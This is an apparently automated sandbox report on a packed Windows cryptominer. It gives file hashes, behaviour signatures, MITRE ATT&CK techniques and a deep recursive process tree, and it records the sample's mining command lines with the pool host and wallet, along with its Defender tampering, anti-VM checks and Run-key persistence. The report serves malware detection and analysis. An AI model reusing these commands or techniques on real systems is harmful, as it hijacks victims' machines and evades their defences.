Analysis

  • max time kernel
    93s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    30-01-2022 03:49

General

  • Target

    afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9.exe

  • Size

    1.1MB

  • MD5

    488bf62441ff75040d50da4c2bec376b

  • SHA1

    29931ab97f4cb72be955fd51994a895732da871e

  • SHA256

    afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

  • SHA512

    ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Themida packer 52 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 13 IoCs
  • Checks whether UAC is enabled 1 TTPs 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
  • Suspicious use of SetThreadContext 24 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9.exe
    "C:\Users\Admin\AppData\Local\Temp\afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9.exe"
    1⤵
    • Checks BIOS information in registry
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3840
    • C:\Windows\bfsvc.exe
      C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:660
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1052
      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4036
        • C:\Windows\bfsvc.exe
          C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
          4⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:4028
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3684
          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
            5⤵
            • Executes dropped EXE
            • Checks BIOS information in registry
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Suspicious use of SetThreadContext
            PID:1724
            • C:\Windows\bfsvc.exe
              C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
              6⤵
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:716
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2452
              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                7⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Adds Run key to start application
                • Checks whether UAC is enabled
                • Suspicious use of SetThreadContext
                PID:3004
                • C:\Windows\bfsvc.exe
                  C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
                  8⤵
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:1132
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
                  8⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3572
                  • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                    9⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Adds Run key to start application
                    • Checks whether UAC is enabled
                    • Suspicious use of SetThreadContext
                    PID:2020
                    • C:\Windows\bfsvc.exe
                      C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
                      10⤵
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:2092
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
                      10⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3052
                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                        "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                        11⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Adds Run key to start application
                        • Checks whether UAC is enabled
                        • Suspicious use of SetThreadContext
                        PID:2552
                        • C:\Windows\bfsvc.exe
                          C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
                          12⤵
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1944
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
                          12⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3368
                          • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                            "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                            13⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Adds Run key to start application
                            • Checks whether UAC is enabled
                            • Suspicious use of SetThreadContext
                            PID:3612
                            • C:\Windows\bfsvc.exe
                              C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
                              14⤵
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:1868
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
                              14⤵
                                PID:2192
                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                  "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                  15⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Adds Run key to start application
                                  • Checks whether UAC is enabled
                                  • Suspicious use of SetThreadContext
                                  PID:3756
                                  • C:\Windows\bfsvc.exe
                                    C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
                                    16⤵
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:2924
                                  • C:\Windows\explorer.exe
                                    C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
                                    16⤵
                                      PID:4068
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                        "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                        17⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Adds Run key to start application
                                        • Checks whether UAC is enabled
                                        • Suspicious use of SetThreadContext
                                        PID:1908
                                        • C:\Windows\bfsvc.exe
                                          C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
                                          18⤵
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:1884
                                        • C:\Windows\explorer.exe
                                          C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
                                          18⤵
                                            PID:1192
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                              "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                              19⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Adds Run key to start application
                                              • Checks whether UAC is enabled
                                              • Suspicious use of SetThreadContext
                                              PID:2620
                                              • C:\Windows\bfsvc.exe
                                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
                                                20⤵
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:2872
                                              • C:\Windows\explorer.exe
                                                C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
                                                20⤵
                                                  PID:380
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                    21⤵
                                                    • Executes dropped EXE
                                                    • Checks BIOS information in registry
                                                    • Adds Run key to start application
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of SetThreadContext
                                                    PID:360
                                                    • C:\Windows\bfsvc.exe
                                                      C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
                                                      22⤵
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:2324
                                                    • C:\Windows\explorer.exe
                                                      C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
                                                      22⤵
                                                        PID:1380
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                          23⤵
                                                          • Executes dropped EXE
                                                          • Checks BIOS information in registry
                                                          • Adds Run key to start application
                                                          • Checks whether UAC is enabled
                                                          • Suspicious use of SetThreadContext
                                                          PID:1652
                                                          • C:\Windows\bfsvc.exe
                                                            C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x6A7B383b4c9eDA1348cc1fD31FDefcC6f20C05f5 -coin etc -worker bigdickzxc -cclock +500 -cvddc +500
                                                            24⤵
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:2012
                                                          • C:\Windows\explorer.exe
                                                            C:\Windows\explorer.exe "123qWef0" "Microsoft%20Basic%20Display%20Adapter" "None" "etc"
                                                            24⤵
                                                              PID:3412
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                                25⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Adds Run key to start application
                                                                • Checks whether UAC is enabled
                                                                PID:3496
                                                                • C:\Windows\system32\WerFault.exe
                                                                  C:\Windows\system32\WerFault.exe -u -p 3496 -s 428
                                                                  26⤵
                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                  • Program crash
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3152

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Defense Evasion

              Modify Registry

              2
              T1112

              Disabling Security Tools

              1
              T1089

              Virtualization/Sandbox Evasion

              1
              T1497

              Discovery

              Query Registry

              2
              T1012

              Virtualization/Sandbox Evasion

              1
              T1497

              System Information Discovery

              2
              T1082

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                MD5

                488bf62441ff75040d50da4c2bec376b

                SHA1

                29931ab97f4cb72be955fd51994a895732da871e

                SHA256

                afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9

                SHA512

                ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047

              • memory/360-198-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/360-197-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/360-196-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/380-194-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/660-120-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/660-118-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/716-136-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/1052-121-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/1052-119-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/1132-144-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/1192-187-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/1380-203-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/1652-206-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/1652-205-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/1652-204-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/1724-132-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/1724-134-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/1724-133-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/1868-168-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/1884-184-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/1908-182-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/1908-181-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/1908-180-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/1944-160-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/2012-208-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/2020-150-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/2020-149-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/2020-148-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/2092-152-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/2192-171-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/2324-200-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/2452-139-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/2552-158-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/2552-157-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/2552-156-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/2620-188-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/2620-190-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/2620-189-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/2872-192-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/2924-176-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/3004-141-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3004-140-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3004-142-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3052-155-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/3368-163-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/3412-211-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/3496-212-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3496-213-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3496-214-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3572-147-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/3612-164-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3612-165-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3612-166-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3684-131-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB

              • memory/3756-172-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3756-174-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3756-173-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/3840-116-0x00007FF7B4A40000-0x00007FF7B4E28000-memory.dmp
                Filesize

                3.9MB

              • memory/3840-117-0x00007FF7B4A40000-0x00007FF7B4E28000-memory.dmp
                Filesize

                3.9MB

              • memory/3840-115-0x00007FF7B4A40000-0x00007FF7B4E28000-memory.dmp
                Filesize

                3.9MB

              • memory/4028-128-0x0000000140000000-0x0000000140815000-memory.dmp
                Filesize

                8.1MB

              • memory/4036-124-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/4036-125-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/4036-126-0x00007FF6A84C0000-0x00007FF6A88A8000-memory.dmp
                Filesize

                3.9MB

              • memory/4068-179-0x0000000140000000-0x000000014002A000-memory.dmp
                Filesize

                168KB